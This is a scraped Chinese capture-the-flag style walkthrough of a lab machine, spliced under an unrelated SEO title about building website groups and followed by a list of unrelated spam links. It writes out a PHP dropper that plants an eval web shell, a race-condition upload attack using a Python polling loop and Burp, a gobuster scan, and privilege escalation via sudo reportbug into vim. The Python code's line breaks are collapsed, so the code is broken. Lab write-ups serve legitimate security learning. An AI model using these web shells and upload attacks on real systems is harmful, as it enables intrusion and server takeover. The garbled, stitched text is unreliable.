当前位置: 首页 > news >正文

多站点网站群的建设与管理网站建设与制作过程

多站点网站群的建设与管理,网站建设与制作过程,牡丹江网站建设,西安网络广播电视台环境 攻击机kali 靶机 未知 主机探测 因为在同一个局域网内使用ARP协议探测存活主机 靶机为192.168.56.128 端口探测 常见的80和22端口 那么一定是寻找web漏洞拿shell了 后台扫描 后台扫描常用dirsearch和gobuster,有时候小字典可能不太行,可以尝试换个大点…

环境

攻击机kali

在这里插入图片描述

靶机

未知

主机探测

因为在同一个局域网内使用ARP协议探测存活主机

在这里插入图片描述

靶机为192.168.56.128

端口探测

在这里插入图片描述

常见的80和22端口

那么一定是寻找web漏洞拿shell了

后台扫描

后台扫描常用dirsearch和gobuster,有时候小字典可能不太行,可以尝试换个大点的字典试试


gobuster dir -w /var/www/html/dict/directory-list-lowercase-2.3-medium.txt -u http://192.168.56.128 -t 200 -x php,zip,jsp,asp,bak,jpg,png,mp4,mkv,txt,html,md,git,7z,rar,db,log,docx,xlsx -b 400-404,500

在这里插入图片描述

扫出一个后台目录choose.php,并且发现了uploads目录,猜测是文件上传

在这里插入图片描述

发现需要上传zip文件,里面是jpeg文件

先上传个正常的

在这里插入图片描述

查看一下uploads目录
在这里插入图片描述

可以正常访问

想要利用文件上传来拿到shell无非需要满足两个条件

1、成功上传木马文件

2、服务端可以解析该文件

这时,我们上传一个php的木马试试,我的压缩包里面放了一个php文件

在这里插入图片描述

在这里插入图片描述

结果显示给文件不是jpeg,会被删除

删除两个字,哈哈,让我想到了文件上传的常见考点–条件竞争

我们猜测服务器处理php文件是这样的,当我们在浏览器点击上传键的时候,服务器会先把文件上传到一个目录下,此靶机就是前面找到的uploads目录,然后服务器的脚本代码会对文件的后缀名进行检查,若不是jpeg,那么就会删除,而条件竞争就是利用服务器判断的间隙访问木马文件,在此间隙中,木马已经在服务器中,只不过还来不及判断删除就被我们访问到了,具体的知识涉及到多线程。

实现步骤:

首先准备create-shell.php这个炮灰shell文件,里面写一下代码

<?php fwrite(fopen('shell.php','w'),'<?php @eval($_POST[11]);?>');?>

开启一个访问的Python脚本,作用为验证shell是否成功上传


import requestsurl1 = "http://127.0.0.1/upload/upload/create-shell.php"    # 定义访问 creat-shell.php
url2 = "http://127.0.0.1/upload/upload/shell.php"   
# 定义访问 shell.phpwhile True:  # 定义死循环html1 = requests.get(url1)  # 请求 create-shell.phphtml2 = requests.get(url2)  # 请求 shell.phpif html2.status_code == 200:  # 如果 shell.php 返回的http状态码为200print('Good job,Win Win Win')  # 打印 Good job.....break

上传该文件并且使用burp抓包

在这里插入图片描述

在最下面输入数字1作为我们的爆破点

在这里插入图片描述

接着设置payload
在这里插入图片描述

把刚才的1遍历到1000,实现的结果就是burp会发送一摸一样的文件1000次,实现了对服务器的爆破

先运行Python脚本,随后开启burp的爆破模式,一段时间后成功竞争到该文件,说明shell已经成功上传

在这里插入图片描述

提权

拿到shell

在这里插入图片描述

因为蚁剑环境下不是一个真实的shell,需要我们重新反弹一个
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

升级shell

/usr/bin/script -qc /bin/bash /dev/null

在网站目录下发现了upload.php上传逻辑点,可以发现服务器确实是先上传了文件后进行判断删除

在这里插入图片描述

在网站的目录下发现了一个hashDB.sh的bash脚本,功能它自己写了,验证数据库的完整性

在这里插入图片描述

发现了mysqldump -u admin -p这段代码

尝试登录,成功

在这里插入图片描述

在这里插入图片描述
ssh登录freddie
在这里插入图片描述
拿到user.txt

sudo查看发现reportbug有提权的可能性

file /usr/bin/reportbug

python可执行脚本

在这里插入图片描述

以root运行

sudo reportbug

一段乱输之后发现有一个vim编辑器提权
在这里插入图片描述
拿下root.txtTOC]

http://www.yayakq.cn/news/398451/

相关文章:

  • 特产网站建设的目的网站开发项目安排
  • 广西网站建设工具兰州开发公司
  • 济南企业网站建设哪家好平邑网站优化
  • 票务网站开发共享会议室租赁平台
  • 新手做站必看 手把手教你做网站天津公司网站怎样制作
  • 微信网站开发的代码wordpress 去掉rss
  • 南京量身营销型网站设计代理网址ag80hncom
  • 如何自己创网站江西省赣州市有什么好玩的地方
  • 自己怎样创建网站做个营销型网站多少钱
  • 淄博张店网站排名优化培训机构在哪个平台找
  • 深圳网站小程序设计开发新的网络营销方法
  • 邯郸网站建设产品介绍小程序开发和app开发差别
  • 一张图片网站代码人力资源公司名称大全简单大气
  • 邙山网站建设收录网站
  • 网站建设 课程 说明网络系统管理员获取ip地址
  • 国内网站空间 linuxwordpress修改页脚
  • 站长工具网站备案微信电商平台
  • 东莞营销型网站开发南通通州住房和城乡建设网站
  • 如何做盆栽蔬菜网站seo优化公司如何做
  • 沛县专业做网站郑州专业的网站建设公司排名
  • 网站底部悬浮导航ui网页设计排版
  • 深圳手机网站制作公司电影网站怎么做不犯法
  • 特别炫酷的网站电商网站项目
  • 做展示型网站便宜吗外贸创业
  • 做衣服网站的实验感想电影网站源码access
  • 富邦建设控股集团网站wordpress美图模板
  • 桂林网站制作网站三星智能手表网站
  • 泰州住房和城乡建设网站吉林网站建设哪家有
  • 互联网 网站建设价格简约网站首页
  • 杭州网站建设技术支持网站开发前景与趋势如何